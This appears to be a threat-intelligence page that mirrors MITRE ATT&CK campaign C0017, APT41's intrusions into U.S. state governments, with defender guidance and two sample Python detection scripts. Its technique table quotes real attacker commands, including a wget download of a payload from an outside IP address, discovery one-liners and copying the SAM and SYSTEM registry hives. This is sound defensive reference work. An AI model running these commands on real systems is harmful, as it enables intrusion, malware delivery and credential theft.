MITRE ATT&CK® Campaign

C0017

C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).[1]

Domain: Enterprise. Object type: Campaign. Object version 1.0.
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

C0017 matters because it shows how a campaign can turn exposed web applications into repeated enterprise compromise, even after remediation. MITRE describes APT41 compromising at least six U.S. state government networks between May 2021 and February 2022 by exploiting vulnerable Internet-facing web applications, adapting to public and zero-day vulnerabilities, and exfiltrating PII. For leaders, the practical issue is not only patching; it is whether remediation is verified, credentials are assumed exposed, and monitoring can prove the attacker did not return.

Executive priority

Prioritize this as an Internet-facing application, identity, and data-protection risk. The supplied description highlights vulnerable public web apps, re-compromise after remediation, credential tooling such as Mimikatz, Active Directory discovery via dsquery, command-and-control, staging, and exfiltration behaviors. Executives should ask whether the organization can identify exposed applications quickly, patch or mitigate urgent vulnerabilities, validate eradication after compromise, preserve evidence for PII-related reporting, and demonstrate to auditors that remediation was effective rather than merely completed.

Technical view

SOC and IR teams should treat C0017 as a relationship-driven campaign profile: initial access through vulnerable public web applications, followed by discovery, credential access, execution, persistence, C2, staging, and exfiltration behaviors. ATT&CK provides no official detection text for the campaign, so validation should be built from the linked techniques and software: Mimikatz, dsquery, Cobalt Strike, KEYPLUG, DEADEYE, Ping, Windows command shell, JavaScript execution, scheduled tasks, masqueraded services/resources, protocol or service impersonation, web-protocol C2, proxy use, local data staging, and exfiltration over C2 or unencrypted non-C2 protocols.

Likely telemetry

  • Internet-facing web application, web server, reverse proxy, and WAF logs around exploitation attempts and suspicious post-exploitation requests
  • Vulnerability management and asset inventory records for externally reachable web applications, including remediation timestamps
  • Endpoint process, command-line, module/load, file creation, and service/task creation telemetry, especially on systems hosting public applications
  • Windows security and registry-related telemetry relevant to SAM access and credential dumping behaviors
  • Active Directory query and administrative tool usage telemetry, including dsquery where present

Detection direction

  • Because MITRE provides no campaign-level detection, map detections to the linked techniques and validate them against local telemetry availability.
  • Correlate public web application alerts with later endpoint execution, command shell activity, scheduled task creation, suspicious services, credential access, AD discovery, and outbound C2-like traffic.
  • Tune for living-off-the-land and dual-use ambiguity: Ping, dsquery, command shells, scheduled tasks, and Cobalt Strike-like activity can be legitimate in some contexts, so detections should include host role, user context, timing, parent process, and destination reputation where available.
  • Look specifically for remediation failure indicators: repeated suspicious activity from the same exposed application, new persistence after patching, or credential use after a host was rebuilt or cleaned.
  • Validate coverage for stealth and evasion relationships, including packed/obfuscated files, masqueraded task or service names, legitimate-looking file locations, and web traffic that blends with normal HTTP/S.
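The correlation and remediation-failure checks described in the two bullets above, as an added example that is not Glexia's or MITRE's code. It runs a simple join over constructed sample telemetry: a WAF exploitation alert on a web host, followed by a command shell spawned from the IIS worker process and a scheduled task whose name matches one of the DEADEYE task paths MITRE lists for C0017 (T1053.005), and then a second task creation after the host's recorded remediation date. Host names, timestamps, the event field names and the `REMEDIATED` record are all assumptions made for the illustration.

```python
"""Added example: correlate a public web-application alert with later endpoint
activity on the same host, and flag persistence that appears after a recorded
remediation. Sample events and field names are constructed, not real logs."""
from datetime import datetime, timedelta

# Scheduled task paths MITRE lists for C0017 DEADEYE persistence (T1053.005).
C0017_TASK_NAMES = {
    r"\Microsoft\Windows\PLA\Server Manager Performance Monitor",
    r"\Microsoft\Windows\Ras\ManagerMobility",
    r"\Microsoft\Windows\WDI\SrvSetupResults",
    r"\Microsoft\Windows\WDI\USOShared",
}
# Web-server worker processes that should rarely spawn an interactive shell.
WEB_WORKERS = {"w3wp.exe", "tomcat9.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample telemetry. 'waf' = exploitation alert from the WAF,
# 'proc' = process creation (Sysmon 1 / 4688 style),
# 'task' = scheduled task created or changed (4698 / 4702 style).
EVENTS = [
    {"ts": "2021-08-10T02:11:05", "host": "web01", "type": "waf",
     "detail": "JNDI lookup pattern in User-Agent header"},
    {"ts": "2021-08-10T02:12:40", "host": "web01", "type": "proc",
     "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c ping %userdomain%"},
    {"ts": "2021-08-10T02:30:00", "host": "web01", "type": "task",
     "name": r"\Microsoft\Windows\WDI\USOShared"},
    {"ts": "2021-08-11T09:00:00", "host": "app02", "type": "proc",
     "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"ts": "2021-09-20T04:15:00", "host": "web01", "type": "task",
     "name": r"\Microsoft\Windows\Ras\ManagerMobility"},
]

# Constructed remediation record: web01 was patched and cleaned on this date.
REMEDIATED = {"web01": "2021-09-01T00:00:00"}


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def suspicious(e):
    """Reason string if an endpoint event merits attention on its own, else None."""
    if (e["type"] == "proc" and e["image"].lower() in SHELLS
            and e["parent"].lower() in WEB_WORKERS):
        return "shell spawned by web worker process"
    if e["type"] == "task" and e["name"] in C0017_TASK_NAMES:
        return "C0017 DEADEYE scheduled task name"
    return None


def correlate(events, window=timedelta(hours=24)):
    """For each WAF alert, collect suspicious endpoint events on the same host
    within `window` after the alert. Returns [(alert_ts, host, [(ts, reason)])]."""
    events = sorted(events, key=_ts)
    findings = []
    for alert in events:
        if alert["type"] != "waf":
            continue
        reasons = []
        for e in events:
            if e["host"] != alert["host"] or e["type"] == "waf":
                continue
            if _ts(alert) <= _ts(e) <= _ts(alert) + window:
                reason = suspicious(e)
                if reason:
                    reasons.append((e["ts"], reason))
        if reasons:
            findings.append((alert["ts"], alert["host"], reasons))
    return findings


def recompromise(events, remediated):
    """Suspicious events on a host after its recorded remediation timestamp;
    these are the 'new persistence after cleanup' indicators."""
    out = []
    for e in events:
        cutoff = remediated.get(e["host"])
        if cutoff and _ts(e) > datetime.fromisoformat(cutoff):
            reason = suspicious(e)
            if reason:
                out.append((e["host"], e["ts"], reason))
    return out


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print("alert-to-endpoint chain:", f)
    for f in recompromise(EVENTS, REMEDIATED):
        print("re-compromise indicator:", f)
```

The `app02` shell launched from `explorer.exe` is deliberately not flagged: parent process and host role are what separate an administrator's `cmd.exe` from one spawned by a web worker, which is the dual-use tuning point the bullets above call for. In production the `REMEDIATED` cutoff would come from the ticketing or vulnerability-management system rather than a literal.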

Mitigation priorities

  • Start with complete inventory and risk ranking of Internet-facing web applications; ensure urgent public vulnerabilities are patched, mitigated, or isolated based on exposure and business criticality.
  • After suspected exploitation, do not treat patching as eradication. Validate host integrity, remove persistence, rotate affected credentials, review AD exposure, and monitor for re-compromise.
  • Harden identity paths reachable from web application servers: restrict privileges, limit credential material on servers, monitor credential dumping indicators, and review service accounts used by exposed applications.
  • Reduce post-compromise movement and exfiltration options through network segmentation, least privilege, controlled egress, and monitoring of outbound web and unencrypted protocols.
  • Maintain evidence needed for incident response and compliance: vulnerability status, remediation actions, log retention, PII data location, access records, and exfiltration assessment artifacts.

Analyst notes and limits

The most important decision point is remediation assurance. The official description states that victims were re-compromised in at least two cases following remediation efforts, making this campaign especially relevant to IR closure criteria, executive reporting, and audit evidence. The relationship set also makes identity telemetry material: Mimikatz, SAM credential access, dsquery, and discovery behaviors suggest defenders should assume a web-app incident may become an enterprise credential and directory exposure problem.

ATT&CK does not provide official detection guidance, campaign platforms, or campaign tactics for C0017 in the supplied fields. Technique and software relationships provide defensive context, but they should not be treated as a complete kill chain for every intrusion. The campaign goals are stated as unknown, although PII exfiltration was observed. Local application inventory, vulnerability exposure, logging coverage, data locations, and incident evidence are required to determine relevance and priority.

Official MITRE ATT&CK definition

C0017

C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

29 rows. Columns: Domain, ID, Name, Relationship / procedure.

Enterprise T1680 Local Storage Discovery

During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.[1]

Enterprise T1027.002 Software Packing (sub-technique)

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[1]

Enterprise T1033 System Owner/User Discovery

During C0017, APT41 used `whoami` to gather information from victim machines.[1]

Enterprise T1036.004 Masquerade Task or Service (sub-technique)

During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.[1]

Enterprise T1016 System Network Configuration Discovery

During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.[1]

Enterprise T1053.005 Scheduled Task (sub-technique)

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.[1]

Enterprise T1190 Exploit Public-Facing Application

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[1]

Enterprise T1505.003 Web Shell (sub-technique)

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[1]

Enterprise T1003.002 Security Account Manager (sub-technique)

During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.[1]

Enterprise T1027 Obfuscated Files or Information

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[1]

Enterprise T1041 Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[1]

Enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol (sub-technique)

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[1]

Enterprise T1074.001 Local Data Staging (sub-technique)

During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.[1]

Enterprise T1071.001 Web Protocols (sub-technique)

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.[1]

Enterprise T1005 Data from Local System

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[1]

Enterprise T1102.001 Dead Drop Resolver (sub-technique)

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[1]

Enterprise T1059.007 JavaScript (sub-technique)

During C0017, APT41 deployed JScript web shells on compromised systems.[1]

Enterprise T1574 Hijack Execution Flow

During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.[1]

Enterprise T1090 Proxy

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[1]

Enterprise T1036.005 Match Legitimate Resource Name or Location (sub-technique)

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[1]

Enterprise T1059.003 Windows Command Shell (sub-technique)

During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.[1]

Enterprise T1001.003 Protocol or Service Impersonation (sub-technique)

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[1]

Enterprise T1134 Access Token Manipulation

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.[1]

Enterprise T1567 Exfiltration Over Web Service

During C0017, APT41 used Cloudflare services for data exfiltration.[1]

Enterprise T1560.003 Archive via Custom Method (sub-technique)

During C0017, APT41 hex-encoded PII data prior to exfiltration.[1]

Enterprise T1588.002 Tool (sub-technique)

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[1]

Enterprise T1105 Ingress Tool Transfer

During C0017, APT41 downloaded malicious payloads onto compromised systems.[1]

Enterprise T1102 Web Service

During C0017, APT41 used the Cloudflare services for C2 communications.[1]
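The T1048.003 and T1560.003 rows above describe hex-encoded data carried out as subdomain labels in DNS lookups. The following is an added detection example, not code from Glexia, MITRE or Mandiant: it parses constructed resolver log lines, strips leading labels that consist only of hexadecimal characters, groups them per client and registered domain, and reports any pair that issues several such queries, decoding the first payload so an analyst can judge whether it is PII. The log format, the `example-c2.test` domain, the client addresses and the thresholds are all assumptions; real data would need a public-suffix list rather than the two-label shortcut used here.

```python
"""Added example: spot hex-encoded data exfiltrated as DNS subdomain labels.
The log lines and domains below are constructed for the illustration."""
import re
from collections import defaultdict

# A label made only of hex digits and long enough to be unlikely as a real
# hostname component (DNS labels are at most 63 characters).
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{16,63}$")

# Constructed resolver log: "<ts> <client> <qname> <qtype>". The three
# example-c2.test queries carry hex-encoded PII-like strings; the single
# 32-hex-char label to updates.example.net and the short a1b2c3d4 label are
# there to show what should *not* be flagged.
DNS_LOG = """\
2021-08-10T03:00:01 10.0.5.12 www.example.com A
2021-08-10T03:00:02 10.0.5.12 4a6f686e20446f652c31323334.collect.example-c2.test A
2021-08-10T03:00:03 10.0.5.12 4a616e6520526f652c35363738.collect.example-c2.test A
2021-08-10T03:00:04 10.0.5.12 416e6e20506f652c39303132.collect.example-c2.test A
2021-08-10T03:00:05 10.0.5.40 0123456789abcdef0123456789abcdef.updates.example.net A
2021-08-10T03:00:06 10.0.5.40 a1b2c3d4.cdn.example.org A
"""


def registered_domain(qname):
    """Last two labels; a production version would consult the public suffix list."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def hex_payload(qname):
    """Concatenate the leading hex-only labels of a name; '' if there are none."""
    labels = qname.rstrip(".").split(".")[:-2]
    out = []
    for label in labels:
        if HEX_LABEL.match(label):
            out.append(label)
        else:
            break
    return "".join(out)


def _decode(hexstr):
    """Best-effort decode of a hex payload for analyst display."""
    try:
        return bytes.fromhex(hexstr).decode("utf-8", "replace")
    except ValueError:  # odd length or stray characters
        return "<undecodable>"


def find_dns_exfil(log, min_queries=3):
    """Group hex-bearing queries by (client, registered domain) and return the
    groups that reach `min_queries`, with query count, approximate bytes carried
    and a decoded sample of the first payload."""
    per_pair = defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, qname, qtype = line.split()
        payload = hex_payload(qname)
        if payload:
            per_pair[(client, registered_domain(qname))].append(payload)
    findings = {}
    for key, payloads in per_pair.items():
        if len(payloads) < min_queries:
            continue
        findings[key] = {
            "queries": len(payloads),
            "bytes": sum(len(p) // 2 for p in payloads),
            "sample": _decode(payloads[0]),
        }
    return findings


if __name__ == "__main__":
    for (client, domain), info in find_dns_exfil(DNS_LOG).items():
        print(f"{client} -> {domain}: {info['queries']} queries, "
              f"~{info['bytes']} bytes, sample={info['sample']!r}")
```

The `min_queries` threshold is what keeps a lone cache-busting or certificate-transparency style hex label from paging anyone; raising it, or adding a per-domain byte budget, is the usual tuning knob. Because the exfiltration here rides ordinary DNS rather than the C2 channel, this logic belongs on resolver or DNS firewall logs, not on the web proxy where the Cloudflare-fronted C2 would be seen.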

Associated objects

Groups, software, and campaigns

Group Enterprise

G0096: APT41

APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]

Malware Enterprise

S0154: Cobalt Strike

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]

Platforms: Linux, macOS, Windows
Malware Enterprise

S1051: KEYPLUG

KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[1]

Platforms: Linux, Windows
Malware Enterprise

S1052: DEADEYE

DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[1]

Platforms: Windows
Tool Enterprise

S0105: dsquery

dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [1] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

Platforms: Windows
Tool Enterprise

S0002: Mimikatz

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [1] [2]

Platforms: Windows
Tool Enterprise

S0097: Ping

Ping is an operating system utility commonly used to troubleshoot and verify network connections. [1]


Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Raw hash: 71597dfcce1c7ab3...

Imported snapshots across ATT&CK releases (1)
Release 19.1; bundle imported: current bundle; object version 1.0; status: current; raw hash 71597dfcce1c…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1] Mandiant APT41: Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

[2] mitre-attack C0017.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.